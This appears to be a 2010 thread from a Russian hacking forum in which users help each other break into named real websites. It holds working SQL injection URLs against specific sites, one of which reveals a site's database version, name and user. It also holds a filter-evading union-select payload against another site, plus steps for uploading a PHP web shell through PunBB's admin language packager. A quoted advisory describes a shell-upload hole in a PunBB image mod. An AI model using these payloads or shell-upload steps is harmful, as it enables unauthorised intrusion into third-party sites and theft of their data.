21.09.2010, 06:38
|
|
Новичок
Регистрация: 26.04.2026
Сообщений: 0
С нами:
28659
Репутация:
0
|
|
Походу blind sql
http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+
Выдает то же,что по запросу
http://www.mirdela.ru/news.php?nid=-351
А если что нибудь убрать,выдаст
2Can not select content
Как такую раскрутить?хотя бы версию узнать.
|
|
|
21.09.2010, 10:53
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от Darth Padla
Darth Padla said:
Походу blind sql
http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+
Выдает то же,что по запросу
http://www.mirdela.ru/news.php?nid=-351
А если что нибудь убрать,выдаст
2Can not select content
Как такую раскрутить?хотя бы версию узнать.
нет там есть вывод. Версия у тебя 4.1.25-log.
Я особо не вдавался в подробности, поэтому покажу как я на горячую нашёл.
Вот запрос - http://www.mirdela.ru/news.php?nid=351/**/union/**/select/**/version(),version(),version(),version(),version(), version(),version(),version(),version()/*
Сделай поиск по 4.1.25-log И увидишь на странице где идёт вывод.
|
|
|
|
21.09.2010, 11:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Darth Padla
Darth Padla said:
Походу blind sql
http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+
Выдает то же,что по запросу
http://www.mirdela.ru/news.php?nid=-351
А если что нибудь убрать,выдаст
2Can not select content
Как такую раскрутить?хотя бы версию узнать.
http://www.mirdela.ru/news.php?nid=351+UNION+SELECT+1,2,AES_DECRYPT%28AE S_ENCRYPT%28CONCAT_WS%280x3a,Version%28%29,Databas e%28%29,User%28%29%29,0x71%29,0x71%29,4,5,6,7,8,9--
Version: 4.1.25-log
Database: nsk24ru0_realty
User: nsk24ru0_realty@localhost
колонок 9 а не 10..order by юзай
|
|
|
|
21.09.2010, 12:41
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Шелл в punBB, кто знает как?
|
|
|
|
21.09.2010, 12:49
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Gorev
Шелл в punBB, кто знает как?
а какая версия?
|
|
|
|
21.09.2010, 12:57
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)
Сообщение от None
================================================== =========
PunBB Automatic Image Upload 1.0 Shell Upload Vulnerability
================================================== =========
@Title: PunBB Image Upload 1.0 Shell Upload Vulnerability
@Author: The_Exploited aka l3d aka Spoof
@Mail: spoof@live.it
@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/
@PHP File Bugged: http://mysite.com/punbb/uploadimg.php
@Shellz: Upload the shell to "uploadimg.php"
@Mod Download: http://www.punres.org/download.php?id=1523
@Mod Version: 1.0
@Date: 2010-04-09
|
|
|
|
21.09.2010, 15:32
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от 547
Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)
version 1.2.14 ничего похожее на packager там нет... (
|
|
|
|
21.09.2010, 15:43
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от Gorev
version 1.2.14 ничего похожее на packager там нет... (
А ты это пробовал ?
http://seclists.org/bugtraq/2007/Apr/174
|
|
|
|
21.09.2010, 15:56
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от kfor
А ты это пробовал ?
http://seclists.org/bugtraq/2007/Apr/174
не могу его использовать так как пасс узнал из других источников нежели из базы форума, не знаю префикс..а гадать его долго...
|
|
|
|
21.09.2010, 18:49
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
ктото с таким сталкивался?
http://www.chinashopunion.com/productinfo.php?id=109+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Комбинированный вид
